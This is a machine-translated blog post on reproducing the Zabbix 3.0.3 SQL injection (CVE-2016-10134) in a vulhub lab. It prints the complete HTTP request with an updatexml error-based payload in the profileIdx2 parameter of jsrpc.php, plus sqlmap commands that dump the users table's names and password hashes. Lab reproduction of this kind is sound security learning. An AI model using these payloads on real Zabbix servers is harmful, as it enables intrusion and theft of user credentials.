当前位置:网站首页>[vulhub shooting range]] ZABBIX SQL injection (cve-2016-10134) vulnerability recurrence
[vulhub shooting range]] ZABBIX SQL injection (cve-2016-10134) vulnerability recurrence
2022-06-24 07:29:00 【Refused guanxiaotong for many times】
List of articles
Preface
A few days ago, a little friend asked me to repeat this loophole , It can't be said to be repeated , The database cannot read , It's strange . So while I have this time today , Just do it , Take notes by the way .
Tips : The following is the main body of this article , The following cases can be used for reference
One 、 Introduction to loopholes
zabbix What is it? ?
zabbix Is a server monitoring software , The reason is server、agent、web And so on , among web Module by PHP To write , Used to display the results in the database .
Vulnerability environment
stay vulhub The range is reproduced , start-up zabbix 3.0.3.
Two 、 Repeat step
1. Start the vulnerability environment
Get into zabbix Catalog ,cd Get into CVE-2016-10134 Catalog , Enter the following command to start the range :
docker-compose up -d

After executing the command , Will start the database (mysql)、zabbix server、zabbix agent 、zabbix web. If the memory is a little small , There may be a situation where a container hangs up .
When all services are displayed done, To successfully visit :
After startup , Wait a moment , visit http://your-ip/8080, Successfully visited zabbix Interface .

2.sql Inject
zabbix Of jsrpc.php Page exists sql Loophole , So by visiting this jsrpc.php Page to trigger the vulnerability , Vulnerability parameter is profileIdx2. Send the following request package to execute sql command , Get database information .
The request package information is as follows :
GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)
HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: zbx_sessionid=7689b1e30e63d9726fa86010d3c6592c; PHPSESSID=3r69f0snsemtpmkeiocgg9blj2
Upgrade-Insecure-Requests: 1

Successfully executed user() command , And return the information .
speak user() Modified into database(), Try to get the database name :
http://your-ip:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,database()),0)

If you are lazy, you can also use tools directly sqlmap, Everything came out after running , No experience :
sqlmap -u "http://192.168.25.130:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=1"

The user name and password are also fixed directly :
sqlmap -u "http://192.168.25.130:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=1" -D zabbix -T users -C name,passwd --dump

summary
It is an ordinary injection recurrence , There's no bypass , No difficulty .
Original article , Welcome to reprint , Please indicate the source of the article : 【Vulhub shooting range 】zabbix-SQL Inject (CVE-2016-10134) Loophole recurrence . Baidu and all kinds of collection stations are not credible , Search carefully to identify . Technical articles generally have timeliness , I am used to revise and update my blog posts from time to time , So visit the source to see the latest version of this article .
边栏推荐
- [WUSTCTF2020]爬
- PCL 点云按比率随机采样
- 20个不容错过的ES6技巧
- [从零开始学习FPGA编程-42]:视野篇 - 后摩尔时代”芯片设计的技术演进-1-现状
- 电脑如何打开软键盘,教大家Win10如何打开软键盘的方法
- MFC多线程 信号量CSemaphore 临界区与互斥 事件
- 简单使用Modbus转BACnet网关教程
- 游戏思考14:对cache_server缓冲服务器的问题思考(读云峰博客有感)
- Coding helps promote the internationalization of Tencent games
- [WordPress website] 5 Set code highlight
猜你喜欢

伦敦金的资金管理比其他都重要

In JS, the regular expression verifies the hour and minute, and converts the input string to the corresponding hour and minute
![[WUSTCTF2020]alison_likes_jojo](/img/a9/dcc6f524772cd0b8781289cbaef63f.png)
[WUSTCTF2020]alison_likes_jojo

【pointNet】基于pointNet的三维点云目标分类识别matlab仿真

get_started_3dsctf_2016

使用SystemParametersInfo访问用户界面设置

【WordPress建站】5. 设置代码高亮
![[image feature extraction] image feature extraction based on pulse coupled neural network (PCNN) including Matlab source code](/img/b3/26cfa385aa357c3a7a77e9db47e94c.png)
[image feature extraction] image feature extraction based on pulse coupled neural network (PCNN) including Matlab source code

How to delete / select an input method on your computer
![[WUSTCTF2020]alison_ likes_ jojo](/img/a9/dcc6f524772cd0b8781289cbaef63f.png)
[WUSTCTF2020]alison_ likes_ jojo
随机推荐
Record the problem location experience when an application is suddenly killed
[MRCTF2020]千层套路
[WordPress website] 6 Article content copy prevention
6000多万铲屎官,捧得出一个国产主粮的春天吗?
Mysql---三张表(student,课程,分数) 查询课程为数学的学生姓名,编号,成绩
Leetcode probability interview shock series 11~15
【Proteus】Arduino UNO + DS1307+LCD1602时间显示
[mrctf2020] thousand layer routine
Cisco router configuration notes: static routing, rip, OSPF, principles combined with experiments, worth a visit!
[equalizer] bit error rate performance comparison simulation of LS equalizer, def equalizer and LMMSE equalizer
Tutorial on simple use of Modbus to BACnet gateway
20 not to be missed ES6 tips
[signal recognition] signal modulation classification based on deep learning CNN with matlab code
Software performance test analysis and tuning practice path - JMeter's performance pressure test analysis and tuning of RPC Services - manuscript excerpts
Huawei Cloud Database Advanced Learning
[GUET-CTF2019]zips
In the era of industrial Internet, there are no more centers in the real sense, and these centers just turn tangible into intangible
Spark stage and shuffle for daily data processing
What is a CC attack? How to judge whether a website is attacked by CC? How to defend against CC attacks?
自动化测试是什么?什么软件项目适合自动化测试?